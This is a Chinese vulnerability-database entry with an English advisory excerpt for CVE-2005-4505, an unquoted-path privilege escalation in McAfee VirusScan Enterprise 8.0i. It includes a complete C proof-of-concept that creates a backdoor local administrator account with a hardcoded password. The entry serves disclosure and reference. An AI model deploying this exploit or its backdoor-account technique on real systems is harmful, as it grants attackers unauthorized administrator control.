McAfee VirusScan路径指定权限提升漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109547 漏洞类型 设计错误
发布时间 2005-12-22 更新时间 2005-12-27
CVE编号 CVE-2005-4505 CNNVD-ID CNNVD-200512-540
漏洞平台 Windows CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/26970
https://cxsecurity.com/issue/WLB-2005120070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-540
|漏洞详情
McAfeeVirusScan是一款流行的实时病毒保护应用程序。McAfeeVirusScan在处理程序执行流程时存在漏洞,本地攻击者可能利用此漏洞本地提升权限。默认下VirusScan中的naPrdMgr.exe进程在本地系统帐号环境中运行,通常过程如下:-尝试运行\ProgramFiles\NetworkAssociates\VirusScan\EntVUtil.EXE-读取C:\ProgramFiles\CommonFiles\NetworkAssociates\Engine\SCAN.DAT-读取C:\ProgramFiles\CommonFiles\NetworkAssociates\Engine\NAMES.DAT-读取C:\ProgramFiles\CommonFiles\NetworkAssociates\Engine\CLEAN.DATnaPrdMgr.exe进程尝试运行C:\ProgramFiles\NetworkAssociates\VirusScan\EntVUtil.EXE文件时存在漏洞。由于缺少引用naPrdMgr.exe进程首先试图运行C:\Program.exe,如果没有找到该文件就会试图运行C:\ProgramFiles\Network.exe,如果仍未找到的话最后会运行最初试图运行的EntVUtil.EXE文件。恶意用户可以创建名为Program.exe的应用程序并放置在C:\根目录下,这样naPrdMgr.exe进程就会以本地系统权限运行该程序。
|漏洞EXP
source: http://www.securityfocus.com/bid/16040/info

McAfee VirusScan is prone to a vulnerability that could allow an arbitrary file to be executed.

The 'naPrdMgr.exe' process calls applications without using properly quoted paths. Successful exploitation may allow local attackers to gain elevated privileges.

McAfee VirusScan Enterprise 8.0i (patch 11) is reportedly vulnerable. Other versions may be affected as well. 

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

     GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program
Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup
Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======
|参考资料

来源:BID
名称:16040
链接:http://www.securityfocus.com/bid/16040
来源:BUGTRAQ
名称:20051222PrivilegeescalationinMcAfeeVirusScanEnterprise8.0i(patch11)andCMA3.5(patch5)
链接:http://www.securityfocus.com/archive/1/420104/100/0/threaded
来源:XF
名称:mcafee-naprdmgr-privilege-escalation(23815)
链接:http://xforce.iss.net/xforce/xfdb/23815
来源:VUPEN
名称:ADV-2005-3077
链接:http://www.frsirt.com/english/advisories/2005/3077
来源:SECTRACK
名称:1015404
链接:http://securitytracker.com/id?1015404
来源:SREASON
名称:292
链接:http://securityreason.com/securityalert/292
来源:MISC
链接:http://reedarvin.thearvins.com/20051222-01.html